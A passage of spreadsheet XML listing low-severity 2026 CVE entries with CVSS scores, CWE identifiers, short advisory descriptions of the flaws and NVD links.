      <c r="B5927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75850</t>
        </is>
      </c>
      <c r="C5927" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5927" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5927" s="5" t="inlineStr"/>
      <c r="F5927" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5927" s="5" t="inlineStr"/>
      <c r="H5927" s="5" t="inlineStr"/>
      <c r="I5927" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5927" s="5" t="inlineStr"/>
      <c r="K5927" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5927" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 fails to bind the authenticated principal (setCurrentUser) on its batch and time-series HTTP handlers. Because no principal is bound on the worker thread, the engine's fine-grained per-type ACL layer (LocalBucket.checkPermissionsOnFile) does not execute for these handlers. In deployments that use per-type or per-group ACLs, a user with database access but only limited per-type permissions can read from and write to types they are not authorized to access by submitting requests to the batch/time-series endpoints. Deployments that rely solely on database-level access control are not affected.</t>
        </is>
      </c>
      <c r="M5927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75850</t>
        </is>
      </c>
    </row>
    <row r="5928">
      <c r="A5928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81738</t>
        </is>
      </c>
      <c r="C5928" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5928" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5928" s="5" t="inlineStr"/>
      <c r="F5928" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5928" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5928" s="5" t="inlineStr"/>
      <c r="I5928" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5928" s="5" t="inlineStr"/>
      <c r="K5928" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="L5928" s="5" t="inlineStr">
        <is>
          <t>OpenVPN 2.5.0 through 2.7.6 on Windows using the tap-windows6 driver allows attackers to trigger an out-of-bounds write via crafted DOMAIN-SEARCH entries</t>
        </is>
      </c>
      <c r="M5928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81738</t>
        </is>
      </c>
    </row>
    <row r="5929">
      <c r="A5929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82060</t>
        </is>
      </c>
      <c r="C5929" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5929" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5929" s="5" t="inlineStr"/>
      <c r="F5929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5929" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H5929" s="5" t="inlineStr"/>
      <c r="I5929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5929" s="5" t="inlineStr"/>
      <c r="K5929" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L5929" s="5" t="inlineStr">
        <is>
          <t>In MongoDB, insufficient validation of shard key values during document insertion allowed authenticated users to store documents with specially crafted, operator-shaped objects as shard key values in sharded collections. When change stream events for such documents were processed with the updateLookup full document mode, the crafted values were embedded into internal post-image lookup queries without proper sanitization, causing them to be interpreted as query operators rather than literal equality values. This could result in change stream consumers receiving incorrect post-image documents or encountering non-resumable fatal errors.</t>
        </is>
      </c>
      <c r="M5929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t>
        </is>
      </c>
    </row>
    <row r="5930">
      <c r="A5930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82584</t>
        </is>
      </c>
      <c r="C5930" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5930" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5930" s="5" t="inlineStr"/>
      <c r="F5930" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5930" s="5" t="inlineStr"/>
      <c r="H5930" s="5" t="inlineStr"/>
      <c r="I5930" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5930" s="5" t="inlineStr"/>
      <c r="K5930" s="5" t="inlineStr">
        <is>
          <t>CWE-150</t>
        </is>
      </c>
      <c r="L5930" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in ash-project igniter allows a malicious package publisher to forge the mix igniter.install confirmation prompt.
mix igniter.install prints a confirmation panel (an anti-typosquatting safeguard) listing a package's hex metadata before adding it. The panel builder in Igniter.Project.Deps wrote publisher-controlled fields (meta.description, owner usernames, requirement names, version) to the terminal with only newlines stripped. A malicious or typosquatted package can embed ANSI terminal escape sequences (cursor movement, line erase, carriage returns) in its metadata to overwrite the panel, forging trusted author names and download counts while concealing the real ones, so a developer relying on the panel to vet the package is deceived into approving a malicious dependency.
This issue affects igniter: from 0.8.1 before 0.8.4.</t>
        </is>
      </c>
      <c r="M5930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82584</t>
        </is>
      </c>
    </row>
    <row r="5931">
      <c r="A5931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82710</t>
        </is>
      </c>
      <c r="C5931" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5931" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5931" s="5" t="inlineStr"/>
      <c r="F5931" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5931" s="5" t="inlineStr"/>
      <c r="H5931" s="5" t="inlineStr"/>
      <c r="I5931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5931" s="5" t="inlineStr"/>
      <c r="K5931" s="5" t="inlineStr">
        <is>
          <t>CWE-150</t>
        </is>
      </c>
      <c r="L5931" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in ash-project usage_rules allows a malicious package publisher to inject terminal control sequences into the output of mix usage_rules.search_docs.
mix usage_rules.search_docs searches Hex documentation through search.hexdocs.pm, which indexes the documentation of every published package, and prints the matching results (title, package, type, doc reference, and highlighted snippets) to the terminal. The formatter in Mix.Tasks.UsageRules.SearchDocs interpolated those publisher-controlled fields verbatim, neutralizing no terminal control characters; the only transform it applied adds escape sequences rather than removing them. A malicious package can embed ANSI terminal escape sequences (cursor movement, line erase, carriage returns, OSC 52 clipboard writes) in its indexed documentation, so when a developer runs a search that surfaces those docs the sequences reach the terminal unchanged — forging the displayed hexdocs URL or a suggested command, hiding text, or writing to the clipboard. No authentication or privileged position is required; only publishing a package.
This issue affects usage_rules: from 0.1.18 before 1.2.8.</t>
        </is>
      </c>
      <c r="M5931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82710</t>
        </is>
      </c>
    </row>
    <row r="5932">
      <c r="A5932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86198</t>
        </is>
      </c>
      <c r="C5932" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5932" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5932" s="5" t="inlineStr"/>
      <c r="F5932" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5932" s="5" t="inlineStr"/>
      <c r="H5932" s="5" t="inlineStr"/>
      <c r="I5932" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5932" s="5" t="inlineStr"/>
      <c r="K5932" s="5" t="inlineStr">
        <is>
          <t>CWE-837</t>
        </is>
      </c>
      <c r="L5932" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.44.2 fail to properly validate multiple ResourcePackClientResponsePacket packets with STATUS_COMPLETED status during resource pack handling. Malicious clients can send batches of these packets to repeatedly trigger pre-spawn progression, creating duplicate Player objects and amplifying memory consumption and network traffic.</t>
        </is>
      </c>
      <c r="M5932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86198</t>
        </is>
      </c>
    </row>
    <row r="5933">
      <c r="A5933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86418</t>
        </is>
      </c>
      <c r="C5933" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5933" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5933" s="5" t="inlineStr"/>
      <c r="F5933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5933" s="5" t="inlineStr"/>
      <c r="H5933" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5933" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5933" s="5" t="inlineStr"/>
      <c r="K5933" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="L5933" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP expose organisation metadata through the dashboard organisation picker without applying the same visibility restrictions enforced by the normal organisation index and per-organisation view.
The affected endpoint returned fields including:
  *  
organisation ID;
  *  
UUID;
  *  
name.
When Security.hide_organisation_index_from_users was enabled, normal organisation enumeration was restricted, but the dashboard picker still queried all organisations. This allowed authenticated users to discover organisations that should have remained hidden from them.
The fix calls Organisation::createConditions($this-&gt;Auth-&gt;user()) and appends the resulting ACL conditions to the picker query. Ordinary users are thereby limited to organisations associated with events or proposals they can already see, plus their own organisation, while users with the appropriate sharing-group privilege retain broader visibility.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M5933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86418</t>
        </is>
      </c>
    </row>
    <row r="5934">
      <c r="A5934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86441</t>
        </is>
      </c>
      <c r="C5934" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5934" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5934" s="5" t="inlineStr"/>
      <c r="F5934" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5934" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H5934" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5934" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5934" s="5" t="inlineStr"/>
      <c r="K5934" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="L5934" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain inconsistent authorization checks across dashboard widgets that display organisation information.
Several organisation-related widgets did not honor Security.hide_organisation_index_from_users. As a result, authenticated users without the perm_sharing_group permission could enumerate organisations even though the normal organisation index was intentionally hidden from them.
The affected widgets included paths that:
  *  
returned organisation names and identifiers;
  *  
could expose additional organisation database fields through JSON export because unrestricted find('all') queries fetched full rows;
  *  
accepted limit=0 or negative values in a way that could effectively remove the result limit and return the entire organisation table.
A related organisation-contributor leaderboard also ignored the same visibility setting. Its handler counted Event.orgc_id across the entire event table and mapped those IDs to organisation names, revealing every organisation with events regardless of whether the caller could see any of those events. The fix withdraws this widget entirely for users who lack organisation-index visibility.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M5934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86441</t>
        </is>
      </c>
    </row>
    <row r="5935">
      <c r="A5935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86739</t>
        </is>
      </c>
      <c r="C5935" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5935" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5935" s="5" t="inlineStr"/>
      <c r="F5935" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5935" s="5" t="inlineStr"/>
      <c r="H5935" s="5" t="inlineStr"/>
      <c r="I5935" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5935" s="5" t="inlineStr"/>
      <c r="K5935" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="L5935" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT 8.6.3 and earlier do not check the return value of Storage::put() when writing the signature PNG and the generated acceptance PDF in Account\AcceptanceController::store(). On filesystem drivers that return false instead of throwing on a write failure (for example the local disk with restrictive permissions, S3 with expired credentials, or a storage backend that is out of quota), execution continues into $acceptance-&gt;accept(), which sets accepted_at and the signature_filename/eula_filename fields, creates the 'accepted' action-log entry, and dispatches completion notifications even though the evidence files were never stored. The result is an acceptance record marked complete whose supporting evidence files do not exist, yielding a materially incomplete compliance artifact for EULA acknowledgement or equipment-receipt workflows. The condition is triggered when an authenticated user completes an acceptance while the storage backend is silently failing writes; an attacker cannot directly force the storage backend into that state. Fixed in Snipe-IT 8.7.0.</t>
        </is>
      </c>
      <c r="M5935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86739</t>
        </is>
      </c>
    </row>
    <row r="5936">
      <c r="A5936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58234</t>
        </is>
      </c>
      <c r="C5936" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="D5936" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5936" s="5" t="inlineStr"/>
      <c r="F5936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5936" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5936" s="5" t="inlineStr"/>
      <c r="I5936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5936" s="5" t="inlineStr"/>
      <c r="K5936" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L5936" s="5" t="inlineStr">
        <is>
          <t>SAP Process Integration (SOAP Adapter) allows a privileged user to send specially crafted requests containing deeply nested entity definitions, which under certain conditions could temporarily increase processor load and degrade system responsiveness. Successful exploitation results in low impact on availability with no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M5936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t>
        </is>
      </c>
    </row>
    <row r="5937">
      <c r="A5937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77648</t>
        </is>
      </c>
      <c r="C5937" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="D5937" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5937" s="5" t="inlineStr"/>
      <c r="F5937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5937" s="5" t="inlineStr"/>
      <c r="H5937" s="5" t="inlineStr"/>
      <c r="I5937" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5937" s="5" t="inlineStr"/>
      <c r="K5937" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5937" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Glance through 32.0.0, the /v2/tasks API accepts type=import tasks that
bypass import_filtering_opts, allowing an admin to fetch internal
URLs from the Glance service network (aka SSRF), as long as https:// or http:// is used. This API has been available only to admins since Xena, and it has been deprecated for several releases.</t>
        </is>
      </c>
      <c r="M5937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77648</t>
        </is>
      </c>
    </row>
    <row r="5938">
      <c r="A5938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84225</t>
        </is>
      </c>
      <c r="C5938" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="D5938" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5938" s="5" t="inlineStr"/>
      <c r="F5938" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5938" s="5" t="inlineStr"/>
      <c r="H5938" s="5" t="inlineStr"/>
      <c r="I5938" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5938" s="5" t="inlineStr"/>
      <c r="K5938" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5938" s="5" t="inlineStr">
        <is>
          <t>The Kirki  WordPress plugin before 6.3.0 does not check that a user is allowed to act on a collaboration comment before changing its state, allowing users whom an administrator has granted content-level access to the page builder to modify comments left by other users, including on pages they cannot themselves open.</t>
        </is>
      </c>
      <c r="M5938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84225</t>
        </is>
      </c>
    </row>
    <row r="5939">
      <c r="A5939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0292</t>
        </is>
      </c>
      <c r="C5939" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5939" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5939" s="5" t="inlineStr"/>
      <c r="F5939" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5939" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, palo alto</t>
        </is>
      </c>
      <c r="H5939" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows, paloaltonetworks:prisma_access_agent</t>
        </is>
      </c>
      <c r="I5939" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5939" s="5" t="inlineStr"/>
      <c r="K5939" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L5939" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass vulnerability in the network driver of Palo Alto Networks Prisma® Access Agent on Windows enables a local administrator to bypass security inspection, subsequently allowing them to  inject and intercept arbitrary network traffic.
The Prisma Access Agent on Linux, macOS, iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M5939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0292</t>
        </is>
      </c>
    </row>
    <row r="5940">
      <c r="A5940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15310</t>
        </is>
      </c>
      <c r="C5940" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5940" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5940" s="5" t="inlineStr"/>
      <c r="F5940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5940" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5940" s="5" t="inlineStr"/>
      <c r="I5940" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5940" s="5" t="inlineStr"/>
      <c r="K5940" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L5940" s="5" t="inlineStr">
        <is>
          <t>When decompressing crafted zip files using the bzip/LZMA/Zstandard 
compressions, Python could use an attacker-controlled size to 
pre-allocate memory, possibly resulting in memory exhaustion.</t>
        </is>
      </c>
      <c r="M5940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15310</t>
        </is>
      </c>
    </row>
    <row r="5941">
      <c r="A5941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21109</t>
        </is>
      </c>
      <c r="C5941" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5941" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5941" s="5" t="inlineStr"/>
      <c r="F5941" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5941" s="5" t="inlineStr"/>
      <c r="H5941" s="5" t="inlineStr"/>
      <c r="I5941" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5941" s="5" t="inlineStr"/>
      <c r="K5941" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5941" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Watch Plugin prior to Android Watch 17 allows local attackers to access sensitive information.</t>
        </is>
      </c>
      <c r="M5941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21109</t>
        </is>
      </c>
    </row>
    <row r="5942">
      <c r="A5942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23922</t>
        </is>
      </c>
      <c r="C5942" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5942" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5942" s="5" t="inlineStr"/>
      <c r="F5942" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5942" s="5" t="inlineStr"/>
      <c r="H5942" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I5942" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5942" s="5" t="inlineStr"/>
      <c r="K5942" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L5942" s="5" t="inlineStr">
        <is>
          <t>The email media OAuth field 'Client secret' cannot be read after saving, but a Super Admin can leak it by setting a malicious 'Token endpoint'. Changes were made to reset the client secret upon changing the token endpoint.</t>
        </is>
      </c>
      <c r="M5942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23922</t>
        </is>
      </c>
    </row>
    <row r="5943">
      <c r="A5943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64655</t>
        </is>
      </c>
      <c r="C5943" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5943" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5943" s="5" t="inlineStr"/>
      <c r="F5943" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5943" s="5" t="inlineStr"/>
      <c r="H5943" s="5" t="inlineStr"/>
      <c r="I5943" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5943" s="5" t="inlineStr"/>
      <c r="K5943" s="5" t="inlineStr">
        <is>
          <t>CWE-185</t>
        </is>
      </c>
      <c r="L5943" s="5" t="inlineStr">
        <is>
          <t>GitHub CLI (gh) is GitHub’s official command line tool. Prior to 2.97.0, gh attestation verify  builds the certificate Subject Alternative Name matcher from the --signer-repo and --signer-workflow  flag values without escaping regex metacharacters, so a user-supplied repository or workflow name is treated as a regular expression rather than a literal string. Because GitHub permits characters such as  `.`  in organization, repository, and workflow path names and  `.`  is a regex wildcard, an attacker can register a lookalike name (for example github/artifact.attestations-workflows) that satisfies a matcher intended for a different trusted signer (github/artifact-attestations-workflows), bypassing the intended Sigstore attestation verification. Exploitation requires the attacker to create a plausible lookalike repository and produce valid attestations from it, which could undermine supply chain verification for CI/CD pipelines or policy gates that pin trust to a specific signing workflow. This issue is fixed in version 2.97.0.</t>
        </is>
      </c>
      <c r="M5943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64655</t>
        </is>
      </c>
    </row>
    <row r="5944">
      <c r="A5944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67350</t>
        </is>
      </c>
      <c r="C5944" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5944" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5944" s="5" t="inlineStr"/>
      <c r="F5944" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5944" s="5" t="inlineStr"/>
      <c r="H5944" s="5" t="inlineStr"/>
      <c r="I5944" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5944" s="5" t="inlineStr"/>
      <c r="K5944" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5944" s="5" t="inlineStr">
        <is>
          <t>Serendipity before 2.6.1 contains an open redirect vulnerability in exit.php that allows unauthenticated attackers to redirect users to arbitrary external sites by supplying a malicious Base64-encoded url parameter when the Track Exits plugin is configured with commentredirection set to s9y. Attackers can craft trusted-looking URLs leveraging the legitimate blog domain to conduct phishing, deliver malware, or bypass URL reputation filters.</t>
        </is>
      </c>
      <c r="M5944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67350</t>
        </is>
      </c>
    </row>
    <row r="5945">
      <c r="A5945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71326</t>
        </is>
      </c>
      <c r="C5945" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5945" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5945" s="5" t="inlineStr"/>
      <c r="F5945" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5945" s="5" t="inlineStr"/>
      <c r="H5945" s="5" t="inlineStr"/>
      <c r="I5945" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5945" s="5" t="inlineStr"/>
      <c r="K5945" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L5945" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 3.6.11 until 3.6.25 and 3.7.10, Traefik's BasicAuth middleware in pkg/middlewares/auth/basic_auth.go deduplicates concurrent password checks with a singleflight key built from the delimiter-free concatenation of password and secret, allowing an attacker who has a valid credential and the stored hash to authenticate as an unconfigured username when headerField trusts the forwarded identity. This issue is fixed in 3.6.25 and 3.7.10.</t>
        </is>
      </c>
      <c r="M5945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71326</t>
        </is>
      </c>
    </row>
    <row r="5946">
      <c r="A5946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72924</t>
        </is>
      </c>
      <c r="C5946" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5946" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5946" s="5" t="inlineStr"/>
      <c r="F5946" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5946" s="5" t="inlineStr"/>
      <c r="H5946" s="5" t="inlineStr"/>
      <c r="I5946" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5946" s="5" t="inlineStr"/>
      <c r="K5946" s="5" t="inlineStr">
        <is>
          <t>CWE-1327, CWE-668</t>
        </is>
      </c>
      <c r="L5946" s="5" t="inlineStr">
        <is>
